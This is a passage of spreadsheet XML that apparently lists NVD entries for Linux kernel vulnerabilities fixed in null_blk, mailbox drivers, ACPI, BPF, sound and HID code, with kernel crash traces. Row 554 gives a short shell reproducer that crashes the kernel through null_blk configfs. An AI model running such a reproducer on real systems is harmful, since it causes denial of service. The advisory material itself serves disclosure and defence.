      <c r="J553" s="5" t="inlineStr"/>
      <c r="K553" s="5" t="inlineStr"/>
      <c r="L553" s="5" t="inlineStr"/>
      <c r="M553" s="5" t="inlineStr"/>
      <c r="N553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O553" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P553" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q553" s="5" t="inlineStr"/>
      <c r="R553" s="5" t="inlineStr"/>
      <c r="S553" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
null_blk: serialize configfs attribute stores with the lock
The NULLB_DEVICE_ATTR _store takes no lock: apply_fn attributes
(submit_queues, poll_queues) get dev-&gt;NAME written again after apply_fn
returns, outside its lock; APPLY=NULL attributes are entirely lockless.
configfs only serializes stores per-open-file, so concurrent stores on
separate fds race.
For apply_fn attributes, once one store's apply_fn has reconfigured the
hardware, a second (losing) store can still overwrite dev-&gt;NAME
afterwards. This leaves dev-&gt;submit_queues out of sync with the live
queue count, which is later caught by the WARN_ON_ONCE() in
null_map_queues().
For !apply_fn attributes, power_store()'s null_add_dev() validates and
builds the device under "lock" but only sets CONFIGURED afterwards. A store
slipping in during this window can change a field mid-setup -- for example,
zone_nr_conv can be pushed above nr_zones after it has already been
clamped, leading to an out-of-bounds dev-&gt;zones[] access.
Take "lock" in the macro around the apply_fn call, the CONFIGURED test and
the field write, and move it out of nullb_apply_submit_queues()/
nullb_apply_poll_queues() so both paths are covered once. This serializes
stores with power_store's setup and with each other.</t>
        </is>
      </c>
      <c r="T553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90185</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90186</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2026-09-17</t>
        </is>
      </c>
      <c r="P554" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q554" s="5" t="inlineStr"/>
      <c r="R554" s="5" t="inlineStr"/>
      <c r="S554" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
null_blk: reject per-device queue resize for shared tag set
When shared_tags is enabled, null_setup_tagset() makes the device use the
global tag_set, whose driver_data stays NULL. null_map_queues() therefore
falls back to the module-wide g_submit_queues/g_poll_queues instead of any
per-device value.
Resizing submit_queues or poll_queues via configfs on such a device calls
blk_mq_update_nr_hw_queues() on the shared set, shrinking
set-&gt;nr_hw_queues.  __blk_mq_realloc_hw_ctxs() only grows the
q-&gt;queue_hw_ctx[] allocation, so on shrink it merely exits and NULLs the
now-excess hctx slots. null_map_queues(), however, keeps mapping CPUs with
the unchanged g_submit_queues/g_poll_queues, so mq_map[] ends up pointing
at those NULLed hctx slots. blk_mq_map_swqueue() then dereferences the NULL
hctx (hctx-&gt;cpumask), crashing the kernel:
[  460.218374] KASAN: null-ptr-deref in range [0x0000000000000098-0x000000000000009f]
[  460.219003] CPU: 24 UID: 0 PID: 1492 Comm: sh Not tainted 7.2.0-rc2+ #67 PREEMPT(full)
[  460.219792] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-4.fc41 04/01/2014
[  460.220452] RIP: 0010:blk_mq_map_swqueue+0x4db/0x1430
......
[  460.228977] Call Trace:
[  460.229175]  &lt;TASK&gt;
[  460.229354]  blk_mq_update_nr_hw_queues+0xd49/0x11c0
[  460.229779]  ? __pfx_blk_mq_update_nr_hw_queues+0x10/0x10
[  460.230200]  nullb_update_nr_hw_queues+0x1a9/0x370 [null_blk]
[  460.230694]  nullb_device_submit_queues_store+0xd9/0x170 [null_blk]
[  460.231190]  ? __pfx_nullb_device_submit_queues_store+0x10/0x10 [null_blk]
[  460.231776]  ? configfs_write_iter+0x35c/0x4e0
[  460.232122]  configfs_write_iter+0x286/0x4e0
[  460.232460]  vfs_write+0x52d/0xd00
[  460.232779]  ? __x64_sys_openat+0x108/0x1d0
[  460.233106]  ? __pfx_vfs_write+0x10/0x10
[  460.233413]  ? fdget_pos+0x1cf/0x4c0
[  460.233745]  ? fput_close+0x133/0x190
[  460.234038]  ? __pfx_expand_files+0x10/0x10
[  460.234368]  ksys_write+0xfc/0x1d0
Reproducer:
modprobe null_blk shared_tags=1 submit_queues=64 poll_queues=1
mkdir /sys/kernel/config/nullb/dev
echo 1 &gt; /sys/kernel/config/nullb/dev/power
echo 1 &gt; /sys/kernel/config/nullb/dev/submit_queues
A per-device resize of a shared tag set is meaningless anyway, so reject it
with -EINVAL in nullb_update_nr_hw_queues() when the device is bound to the
global tag_set.</t>
        </is>
      </c>
      <c r="T554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90186</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90187</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2026-09-17</t>
        </is>
      </c>
      <c r="P555" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q555" s="5" t="inlineStr"/>
      <c r="R555" s="5" t="inlineStr"/>
      <c r="S555" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
null_blk: free zones array on device power-off
null_init_zoned_dev() allocates dev-&gt;zones when a zoned device is powered
on, but null_del_dev() never frees it on power-off; dev-&gt;zones is only
freed later in null_free_dev(), when the configfs directory is removed. If
the device is powered off and then on again, null_init_zoned_dev()
allocates a new array and overwrites the dev-&gt;zones pointer, leaking the
previous allocation each power cycle.
Free dev-&gt;zones in null_del_dev() via null_free_zoned_dev() to solve it.
And calling null_free_zoned_dev() in null_free_dev() is no longer necessary
because every caller already invokes null_del_dev() first: via
nullb_group_drop_item() before nullb_device_release(), in the
null_add_dev() error path of null_create_dev(), and in null_destroy_dev().
Remove the redundant call.
And take &amp;lock around zone_cond_store() in the two store wrappers to
serialize dev-&gt;zones check-and-deref against its alloc/free, which already
run under &amp;lock. The reason there was no problem before is that only
nullb_device_release() or null_exit() frees the dev-&gt;zones, which
guarantees that subsequent users won't access the configfs interface.</t>
        </is>
      </c>
      <c r="T555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90187</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90188</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2026-09-17</t>
        </is>
      </c>
      <c r="P556" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q556" s="5" t="inlineStr"/>
      <c r="R556" s="5" t="inlineStr"/>
      <c r="S556" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
null_blk: free global tag_set on init error path
If shared_tags is enabled, null_setup_tagset() allocates the global tag_set
via null_init_global_tag_set(). If device creation later fails, err_dev
destroys the default devices and calls unregister_blkdev(), but never frees
the global tag_set. Since module init failed, null_exit() is never invoked,
so the global tag_set's tags and maps are permanently leaked.
Free the global tag_set in err_dev, matching null_exit() which does
if (tag_set.ops) blk_mq_free_tag_set(&amp;tag_set).</t>
        </is>
      </c>
      <c r="T556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90188</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90189</t>
        </is>
      </c>
      <c r="D557" s="5" t="inlineStr"/>
      <c r="E557" s="5" t="inlineStr"/>
      <c r="F557" s="5" t="inlineStr"/>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="inlineStr"/>
      <c r="I557" s="5" t="inlineStr"/>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr"/>
      <c r="L557" s="5" t="inlineStr"/>
      <c r="M557" s="5" t="inlineStr"/>
      <c r="N557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O557" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P557" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q557" s="5" t="inlineStr"/>
      <c r="R557" s="5" t="inlineStr"/>
      <c r="S557" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
null_blk: register configfs subsystem after creating default devices
In null_init(), configfs_register_subsystem() currently runs before
register_blkdev(), so when null_blk is built as a module, a racing mkdir()
+ poweron from userspace can reach null_add_dev() while null_major is still
0. __add_disk() then hits WARN_ON(disk-&gt;minors) (major=0 with minors!=0)
and fails:
[root@fedora ~]# [ 2366.521436] WARNING: block/genhd.c:476 at __add_disk+0x8a7/0xde0,
[ 2366.523552] Modules linked in: null_blk(+) nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib
[ 2366.529081] CPU: 26 UID: 0 PID: 1600 Comm: sh Not tainted 7.2.0-rc1+ #66 PREEMPT(full)
......
[ 2366.547251] Call Trace:
[ 2366.547575]  &lt;TASK&gt;
[ 2366.547831]  ? _raw_spin_lock+0x84/0xe0
[ 2366.548260]  add_disk_fwnode+0x114/0x560
[ 2366.548739]  null_add_dev+0x102d/0x1b80 [null_blk]
[ 2366.549310]  ? __pfx_null_add_dev+0x10/0x10 [null_blk]
[ 2366.549906]  ? mutex_lock+0xde/0x1c0
[ 2366.550361]  ? __pfx_mutex_lock+0x10/0x10
[ 2366.550827]  nullb_device_power_store+0x1e7/0x280 [null_blk]
[ 2366.551499]  ? __pfx_nullb_device_power_store+0x10/0x10 [null_blk]
[ 2366.552177]  ? __kmalloc_cache_noprof+0x1f5/0x470
[ 2366.552748]  ? configfs_write_iter+0x35c/0x4e0
[ 2366.553242]  configfs_write_iter+0x286/0x4e0
[ 2366.553787]  vfs_write+0x52d/0xd00
[ 2366.554169]  ? __pfx_vfs_write+0x10/0x10
[ 2366.554679]  ? __pfx___css_rstat_updated+0x10/0x10
[ 2366.555196]  ? fdget_pos+0x1cf/0x4c0
[ 2366.555649]  ksys_write+0xfc/0x1d0
......
Additionally, the err_dev path destroys all devices on nullb_list while
configfs is still registered. If a racing mkdir() + poweron puts a user
device on the list, null_destroy_dev()-&gt;null_free_dev() kfrees the user
device's nullb_device but /sys/kernel/config/nullb/&lt;name&gt; is still
reachable. Any userspace access to the item will trigger a UAF.
For simplicity, move configfs_register_subsystem() to the end to solve
the problems above.</t>
        </is>
      </c>
      <c r="T557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90189</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90190</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2026-09-17</t>
        </is>
      </c>
      <c r="P558" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q558" s="5" t="inlineStr"/>
      <c r="R558" s="5" t="inlineStr"/>
      <c r="S558" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
null_blk: use DEFINE_MUTEX for the file-scope mutex
In null_init(), mutex_init(&amp;lock) currently happens after
configfs_register_subsystem(), which exposes the nullb subsystem to
userspace. A racing mkdir() into /sys/kernel/config/nullb/ can reach
null_find_dev_by_name() -&gt; mutex_lock(&amp;lock) before the mutex is
initialized, trigger warning:
[  123.137788] DEBUG_LOCKS_WARN_ON(lock-&gt;magic != lock)
[  123.137796] WARNING: kernel/locking/mutex.c:159 at mutex_lock+0x171/0x1c0, CPU#13: mkdir/1301
[  123.140090] Modules linked in: null_blk(+) nft_fib_inet nft_fib_ipv4
......
[  123.154926] Call Trace:
[  123.155172]  &lt;TASK&gt;
[  123.155419]  ? __pfx_mutex_lock+0x10/0x10
[  123.156181]  ? __pfx__raw_spin_lock+0x10/0x10
[  123.156571]  nullb_group_make_group+0x20/0x100 [null_blk]
[  123.157011]  configfs_mkdir+0x47b/0xc70
[  123.157337]  ? __pfx_configfs_mkdir+0x10/0x10
[  123.157719]  ? may_create_dentry+0x242/0x2e0
[  123.158061]  vfs_mkdir+0x2a9/0x6c0
[  123.158352]  filename_mkdirat+0x3dc/0x500
[  123.158710]  ? __pfx_filename_mkdirat+0x10/0x10
[  123.159070]  ? strncpy_from_user+0x3a/0x1d0
[  123.159413]  __x64_sys_mkdir+0x6b/0x90
[  123.159760]  do_syscall_64+0xea/0x600
Replace the runtime mutex_init(&amp;lock) with a static DEFINE_MUTEX(lock)
declaration to fix this issue.</t>
        </is>
      </c>
      <c r="T558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90190</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90191</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2026-09-17</t>
        </is>
      </c>
      <c r="P559" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q559" s="5" t="inlineStr"/>
      <c r="R559" s="5" t="inlineStr"/>
      <c r="S559" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mailbox: riscv-sbi-mpxy: validate RPMI notification lengths
The SBI return value controls how many bytes are copied from shared
memory into the RPMI notification buffer. It is not validated against
the negotiated shared-memory size before that copy. The event walker
also uses a reversed loop condition and can inspect a short event record.
Validate the complete notification length before copying it, iterate only
while a full event header remains, and stop when a declared event payload
extends beyond the copied notification data.</t>
        </is>
      </c>
      <c r="T559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90191</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90192</t>
        </is>
      </c>
      <c r="D560" s="5" t="inlineStr"/>
      <c r="E560" s="5" t="inlineStr"/>
      <c r="F560" s="5" t="inlineStr"/>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="inlineStr"/>
      <c r="I560" s="5" t="inlineStr"/>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr"/>
      <c r="L560" s="5" t="inlineStr"/>
      <c r="M560" s="5" t="inlineStr"/>
      <c r="N560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O560" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P560" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q560" s="5" t="inlineStr"/>
      <c r="R560" s="5" t="inlineStr"/>
      <c r="S560" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mailbox: qcom-cpucp: handle NULL data in send_data callback
mailbox_clear_channel() calls mbox_send_message() with NULL data to
notify the remote side that the RX channel has been cleared.
qcom_cpucp_mbox_send_data() blindly dereferenced the data pointer,
causing a NULL pointer dereference kernel panic when invoked from
this path under PREEMPT_RT.
Add an explicit NULL check and return early without writing to the
TX register, which is the correct behaviour for a channel-clear
notification.</t>
        </is>
      </c>
      <c r="T560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90192</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90193</t>
        </is>
      </c>
      <c r="D561" s="5" t="inlineStr"/>
      <c r="E561" s="5" t="inlineStr"/>
      <c r="F561" s="5" t="inlineStr"/>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="inlineStr"/>
      <c r="I561" s="5" t="inlineStr"/>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr"/>
      <c r="L561" s="5" t="inlineStr"/>
      <c r="M561" s="5" t="inlineStr"/>
      <c r="N561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O561" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P561" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q561" s="5" t="inlineStr"/>
      <c r="R561" s="5" t="inlineStr"/>
      <c r="S561" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mailbox: qcom-cpucp: fix PREEMPT_RT self-deadlock in IRQ handler
qcom_cpucp_mbox_irq_fn() calls mbox_chan_received_data() while holding
chan-&gt;lock. Under PREEMPT_RT, spin_lock_irqsave() is converted to an
rt_spinlock (rtmutex-based), which tracks ownership and can sleep.
The callback chain triggered by mbox_chan_received_data() eventually
reaches mailbox_clear_channel() -&gt; mbox_send_message() -&gt; add_to_rbuf(),
which attempts to re-acquire the same chan-&gt;lock. Since rtmutex detects
the re-entrant lock attempt by the same owner, the thread blocks waiting
for a lock it already holds, causing a permanent deadlock.
This deadlock manifests as 'irq/N-apss_cpucp_mbox' stuck in D state
with the following call trace:
  rt_spin_lock -&gt; mbox_send_message -&gt; mailbox_clear_channel -&gt;
  scmi_rx_callback -&gt; mbox_chan_received_data [&lt;- held chan-&gt;lock here]
Fix by saving chan-&gt;cl locally and clearing the HW interrupt register
inside the lock, then invoking mbox_chan_received_data() after releasing
the lock. This preserves the mutual exclusion for chan-&gt;cl access while
avoiding the lock re-entrancy that causes the PREEMPT_RT deadlock.</t>
        </is>
      </c>
      <c r="T561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90193</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90194</t>
        </is>
      </c>
      <c r="D562" s="5" t="inlineStr"/>
      <c r="E562" s="5" t="inlineStr"/>
      <c r="F562" s="5" t="inlineStr"/>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="inlineStr"/>
      <c r="I562" s="5" t="inlineStr"/>
      <c r="J562" s="5" t="inlineStr"/>
      <c r="K562" s="5" t="inlineStr"/>
      <c r="L562" s="5" t="inlineStr"/>
      <c r="M562" s="5" t="inlineStr"/>
      <c r="N562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O562" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P562" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q562" s="5" t="inlineStr"/>
      <c r="R562" s="5" t="inlineStr"/>
      <c r="S562" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: scan: fix bus ID cleanup on device_add() failures
When device_add() fails after acpi_device_set_name() has allocated an
instance ID and a new acpi_device_bus_id has been linked into
acpi_bus_id_list, the rollback path only removes wakeup_list and
detaches the ACPI handle data.
That leaves the bus-ID bookkeeping behind and keeps the allocated
instance number consumed.
Move the bus-ID cleanup and wakeup-list removal into a single helper.
Use it from both the normal device teardown path and the device_add()
rollback path. The wakeup list node is initialized before registration,
so it can be deleted without checking whether the device is wakeup-
capable like in the original teardown path.
[ rjw: Rename acpi_device_del_list() to acpi_device_cleanup() ]
[ rjw: Subject and changelog edits ]</t>
        </is>
      </c>
      <c r="T562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90194</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90195</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2026-09-17</t>
        </is>
      </c>
      <c r="P563" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q563" s="5" t="inlineStr"/>
      <c r="R563" s="5" t="inlineStr"/>
      <c r="S563" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
riscv, bpf: Fix missing sign-ext for signed 1-byte and 2-byte kfunc args
On RV64, the ABI requires sign-extension for signed 1-byte and 2-byte kfunc
args. However, the RV64 JIT currently does not perform sign-extension for
such kfunc args.
Before commit 7ce090afbf72 ("bpf: Infer zext_dst based on static register
liveness analysis"), state pruning could potentially omit zero-extension
of 32-bit subregisters, which inadvertently masked the above issue by making
the args appear as if they had been properly sign-extended. After that
commit, the problem is exposed, causing the kfunc_call/kfunc_call_test4
selftest to fail.
Fix this by extending the existing sign-extension logic to handle signed
1-byte and 2-byte kfunc args as well.</t>
        </is>
      </c>
      <c r="T563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90195</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90196</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2026-09-17</t>
        </is>
      </c>
      <c r="P564" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q564" s="5" t="inlineStr"/>
      <c r="R564" s="5" t="inlineStr"/>
      <c r="S564" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: SOF: validate topology volume range before allocation
SOF treats the topology mixer min and max values as non-negative indices
into its volume table. It stores them in signed fields, allocates max + 1
entries through an int argument, and later indexes the table with the
stored range.
An inverted range is invalid, while a maximum at or above INT_MAX cannot
be represented safely after the increment or in the signed fields.
Validate the complete range before storing it or allocating the table.</t>
        </is>
      </c>
      <c r="T564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90196</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90197</t>
        </is>
      </c>
      <c r="D565" s="5" t="inlineStr"/>
      <c r="E565" s="5" t="inlineStr"/>
      <c r="F565" s="5" t="inlineStr"/>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="inlineStr"/>
      <c r="I565" s="5" t="inlineStr"/>
      <c r="J565" s="5" t="inlineStr"/>
      <c r="K565" s="5" t="inlineStr"/>
      <c r="L565" s="5" t="inlineStr"/>
      <c r="M565" s="5" t="inlineStr"/>
      <c r="N565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O565" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P565" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q565" s="5" t="inlineStr"/>
      <c r="R565" s="5" t="inlineStr"/>
      <c r="S565" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: haptic: don't write an uninitialized value to unhandled usages
fill_effect_buf() initializes value only for the four haptic usages
handled by its switch, but writes it to field-&gt;value[] for every usage.
An unhandled usage can therefore receive either an uninitialized value
or one left over from the previous usage. hid_output_report() then
serializes that value into the effect's report buffer.
Skip unhandled usages instead. This also matches switch_mode(), which
only updates fields it recognizes.
Found with Clang's -Wconditional-uninitialized.</t>
        </is>
      </c>
      <c r="T565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90197</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90198</t>
        </is>
      </c>
      <c r="D566" s="5" t="inlineStr"/>
      <c r="E566" s="5" t="inlineStr"/>
      <c r="F566" s="5" t="inlineStr"/>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="inlineStr"/>
      <c r="I566" s="5" t="inlineStr"/>
      <c r="J566" s="5" t="inlineStr"/>
      <c r="K566" s="5" t="inlineStr"/>
      <c r="L566" s="5" t="inlineStr"/>
      <c r="M566" s="5" t="inlineStr"/>
      <c r="N566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O566" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P566" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q566" s="5" t="inlineStr"/>
      <c r="R566" s="5" t="inlineStr"/>
      <c r="S566" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: core: Fix use-after-free in snd_card_do_free()
A use-after-free was detected in snd_card_do_free() when a sound card
managed by devres is unbound while a user-space application still holds an
open file descriptor.
For managed cards, the memory is allocated using devres_alloc(), and its
release function is set to __snd_card_release(), which calls
snd_card_free(). When the device is unbound, the unbind thread calls
snd_card_free(), which drops a reference to the card's device. If the user
thread still has an open file descriptor, the reference count does not
reach zero, and the unbind thread blocks on wait_for_completion(&amp;released).
When the user thread closes the file descriptor, it drops the final
reference, invoking the device release callback release_card_device(),
which calls snd_card_do_free(). snd_card_do_free() performs cleanup and
calls complete(card-&gt;release_completion). This wakes up the unbind thread,
which returns from snd_card_free() and __snd_card_release(). The devres
core then immediately frees the memory block containing the snd_card
structure.
Meanwhile, the user thread continues execution in snd_card_do_free() and
evaluates `if (!card-&gt;managed)`. It reads the `managed` boolean from the
snd_card structure that was just freed by the unbind thread, triggering a
KASAN use-after-free.
Fix this by caching the value of card-&gt;managed in a local variable before
calling complete(). This ensures that the card pointer is not dereferenced
after the unbind thread has been woken up and potentially freed the card.
BUG: KASAN: use-after-free in snd_card_do_free sound/core/init.c:604
[inline]
BUG: KASAN: use-after-free in release_card_device+0x1ab/0x1b0
sound/core/init.c:153
Read of size 1 at addr ffff8881912ec909 by task syz-executor130/5857
Call Trace:
 &lt;TASK&gt;
 dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120
 print_address_description+0x55/0x1e0 mm/kasan/report.c:378
 print_report+0x58/0x70 mm/kasan/report.c:482
 kasan_report+0x117/0x150 mm/kasan/report.c:595
 snd_card_do_free sound/core/init.c:604 [inline]
 release_card_device+0x1ab/0x1b0 sound/core/init.c:153
 device_release+0xc4/0x1f0 drivers/base/core.c:-1
 kobject_cleanup lib/kobject.c:689 [inline]
 kobject_release lib/kobject.c:720 [inline]
 kref_put include/linux/kref.h:65 [inline]
 kobject_put+0x222/0x550 lib/kobject.c:737
 snd_card_file_remove+0x331/0x390 sound/core/init.c:1125
 snd_pcm_release+0x12c/0x160 sound/core/pcm_native.c:2986
 __fput+0x418/0xa50 fs/file_table.c:512
 fput_close_sync+0x11f/0x240 fs/file_table.c:617
 __do_sys_close fs/open.c:1511 [inline]
 __se_sys_close fs/open.c:1496 [inline]
 __x64_sys_close+0x7e/0x110 fs/open.c:1496
 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
 do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
 &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90198</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
